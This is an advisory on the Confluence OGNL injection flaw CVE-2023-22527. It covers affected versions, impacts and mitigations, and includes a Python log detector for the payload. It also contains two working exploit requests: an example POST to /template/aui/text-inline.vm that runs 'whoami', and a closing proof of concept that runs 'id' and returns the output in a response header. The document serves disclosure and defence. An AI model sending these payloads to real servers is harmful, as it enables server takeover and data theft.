Atlassian Confluence Pre-Auth RCE via OGNL Injection – CVE-2023-22527

Vulnerable Version

versions 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3

Fixed Version

Fixed in the latest release; update to the latest version.

Base Score

9.8 Critical

Vendor Description:-

Confluence is a web-based corporate wiki created by Atlassian, an Australian software firm formed in 2002. Launched in 2004, it immediately became one of Atlassian’s key products, assisting teams in better document management and collaboration. Confluence evolved from a simple wiki to a comprehensive enterprise knowledge management platform that includes real-time editing, connectors, and customized workflows. Atlassian provides Confluence as both a cloud service and an on-premise Data Center edition, providing flexibility for various enterprises. Today, it is widely utilized across industries as part of Atlassian’s larger array of productivity and development tools.

What is an OGNL Injection Attack?

Object-Graph Navigation Language (OGNL) is a Java expression language that is widely used in frameworks and applications such as Apache Struts and Atlassian Confluence. OGNL provides a compact syntax for describing complex operations on Java objects, allowing developers to read and modify properties, invoke methods, and navigate object relationships.

When an application fails to properly validate and sanitize user input before using it in an OGNL expression, a security flaw known as OGNL injection can arise. In an OGNL injection attack, an adversary submits specially crafted strings containing OGNL expressions through user interfaces or input fields. When the application processes this input without adequate validation, the injected OGNL expressions are evaluated within the application context. This can lead to a variety of security risks, including unauthorized access to sensitive data and remote code execution.

How does the Atlassian Confluence CVE-2023-22527 Exploit Work?

Atlassian Confluence’s CVE-2023-22527 vulnerability is an OGNL injection flaw that lets unauthenticated attackers execute arbitrary commands remotely on a vulnerable Confluence instance. The vulnerability lies in a Velocity template file named “text-inline.vm” [3]. This template allows an adversary to reach the OGNL evaluator through the expression #request['.KEY_velocity.struts2.context'].internalGet('ognl'), so the attacker controls what is evaluated. An example payload sent via an HTTP POST request is shown below.

//Attacker-crafted POST request

POST /template/aui/text-inline.vm HTTP/1.1
Host: <vulnerable_Confluence_instance>
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 243

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,%7b%7d)%2b\u0027&x=(new freemarker.template.utility.Execute()).exec(%7b%22whoami%22%7d)

Impacts:-

  • Allows remote attackers to run arbitrary system commands on the Confluence servers.
  • Can result in complete server compromise, including reading or changing sensitive files.
  • May allow lateral movement inside the internal network.
  • Can be used to spread malware or ransomware.
  • Exposes critical passwords or configuration data, jeopardizing overall enterprise security.

Mitigations:-

  • Upgrade to the latest version.
  • Restrict Confluence access to trusted internal networks and require strong authentication.
  • Disable or limit OGNL and other template-based expression evaluation.
  • Monitor server logs for unusual POST requests (for example, POSTs to /template/*.vm paths) and deploy a Web Application Firewall (WAF).
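
The encodings in the payload above (%2b for “+”, \u0027 for a quote, \u005b for a bracket) are exactly what a naive log grep for internalGet or a quote character would miss, because the OGNL parser unescapes them only server-side. The following Python script is an added example, not part of this advisory: it normalizes a request body the way the parser would and flags POSTs to Velocity templates that carry the indicators visible in the payload above, which supports the log-monitoring mitigation. It assumes request records have already been extracted from a reverse proxy or WAF log into dicts with method, path and body keys; the sample records are constructed.

```python
"""Flag HTTP requests that carry CVE-2023-22527-style OGNL payloads.

Added example (not from the advisory). It assumes request records have
already been extracted from a reverse proxy or WAF log into dicts with
"method", "path" and "body" keys; the sample records below are constructed.
"""
import re
from urllib.parse import unquote

# Indicators taken from the payload shape shown in the advisory: the
# Velocity template endpoint, the Struts context lookup, and the OGNL
# helpers the expression chains together.
VM_TEMPLATE_PATH = re.compile(r"^/template/.*\.vm$", re.IGNORECASE)
BODY_INDICATORS = (
    ".KEY_velocity.struts2.context",
    "internalGet(",
    "findValue(",
    "freemarker.template.utility.Execute",
)

_UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")


def normalize(body: str, max_rounds: int = 3) -> str:
    """Undo the encodings layered on the body to defeat naive string matching.

    The published payload URL-encodes punctuation (%2b, %7b) and writes quotes
    and brackets as Java-style \\u0027 / \\u005b escapes, which the OGNL parser
    unescapes server-side. URL decoding is repeated until it stops changing
    (bounded) so double-encoded bodies are handled, then \\uXXXX is expanded.
    """
    text = body
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return _UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def matched_indicators(request: dict) -> list:
    """Return the indicators this request triggers (empty list = clean)."""
    hits = []
    if request["method"].upper() == "POST" and VM_TEMPLATE_PATH.match(request["path"]):
        hits.append("post-to-vm-template")
    body = normalize(request.get("body", ""))
    hits.extend(ind for ind in BODY_INDICATORS if ind in body)
    return hits


def detect(requests) -> list:
    """Filter a stream of request records down to those worth an analyst's eyes.

    A bare POST to a .vm template is suspicious on its own; any body indicator
    confirms it. Either is enough to surface the record.
    """
    findings = []
    for req in requests:
        hits = matched_indicators(req)
        if hits:
            findings.append({"path": req["path"], "indicators": hits})
    return findings


# Constructed sample records (not real traffic). The third mirrors the
# encoding style of the advisory's payload; the command part is a placeholder.
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/login.action", "body": ""},
    {"method": "POST", "path": "/rest/api/content",
     "body": '{"title": "weekly notes", "type": "page"}'},
    {"method": "POST", "path": "/template/aui/text-inline.vm",
     "body": ("label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context"
              "\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,%7b%7d)"
              "%2b\\u0027&x=PLACEHOLDER")},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_REQUESTS):
        print(finding["path"], "->", ", ".join(finding["indicators"]))
```

The decoding step is the part worth carrying into a WAF rule or SIEM query: match on the normalized body, not the raw one, and treat any POST to a .vm path under /template/ as reviewable even when no body indicator fires, since the template endpoint itself is not something ordinary clients post to.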

POC

Sending the following request executes arbitrary commands inside a crafted OGNL expression and returns the output in the response:

POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 285

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&[email protected]@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
